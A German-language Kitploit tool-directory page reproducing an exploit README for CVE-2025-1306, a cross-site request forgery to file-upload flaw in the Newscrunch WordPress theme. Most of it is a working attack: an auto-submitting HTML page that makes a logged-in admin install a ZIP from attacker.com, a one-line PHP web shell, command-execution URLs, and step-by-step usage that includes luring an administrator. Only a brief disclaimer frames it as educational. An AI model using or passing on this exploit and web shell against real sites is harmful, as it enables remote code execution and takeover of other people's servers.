Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Site-übergreifende Anfragenfälschung zu beliebigem Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-1306
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationLernen & Bildung
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Site-übergreifende Anfragenfälschung zu beliebigem Datei-Upload

Repository anzeigen
53vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Newscrunch Exploit (CVE-2025-1306)

🚨 Übersicht

Dieser Exploit zielt auf eine Cross-Site Request Forgery (CSRF) zu beliebigem Datei-Upload-Schwachstelle (CVE-2025-1306) im Newscrunch WordPress-Theme ab. Aufgrund fehlender Nonce-Überprüfung in der Funktion newscrunch_install_and_activate_plugin() kann ein nicht authentifizierter Angreifer einen eingeloggten Administrator dazu verleiten, beliebige Dateien auf den Server hochzuladen, was zu Remote Code Execution (RCE) führt.


🔥 Schwachstellendetails

  • CVE-ID: CVE-2025-1306
  • Betroffene Software: Newscrunch WordPress-Theme (<= 1.8.4)
  • CWE-Klassifizierung: CWE-352 – Cross-Site Request Forgery (CSRF)
  • CVSS-Score: 8.8 (HOCH)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Veröffentlichungsdatum: 4. März 2025

🛑 Schweregrad & Auswirkungen

  • ✅ Remote Code Execution (RCE)
  • ✅ Vollständige Systemkompromittierung
  • ✅ CSRF-basierter beliebiger Datei-Upload
  • ✅ Nicht authentifizierter Angriffsvektor

Ausnutzbarkeit: Erfordert, dass ein Administrator einen manipulierten bösartigen Link besucht.


📜 Exploit-Code

Dieser Exploit zwingt einen authentifizierten Administrator, einen CSRF-Angriff auszuführen, der eine bösartige ZIP-Datei mit einer Web-Shell hochlädt.

🔹 PoC – HTML-Exploit

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Ersetzen:

  • http://target.com/ durch die verwundbare WordPress-Seite
  • http://attacker.com/shell.zip durch eine bösartige ZIP-Nutzlast mit einer Web-Shell.

🔹 Beispiel für bösartige PHP-Shell

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 Nach erfolgreicher Ausnutzung greifen Sie auf die Shell zu:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Verwendung

  1. Hosting der HTML-Datei auf einer vom Angreifer kontrollierten Website.
  2. Senden Sie den bösartigen Link an einen authentifizierten WordPress-Administrator.
  3. Sobald der Admin die Seite besucht, wird die Shell automatisch hochgeladen.
  4. Führen Sie Befehle remote aus mit:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die unbefugte Ausnutzung von Schwachstellen ist illegal und strafbar. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen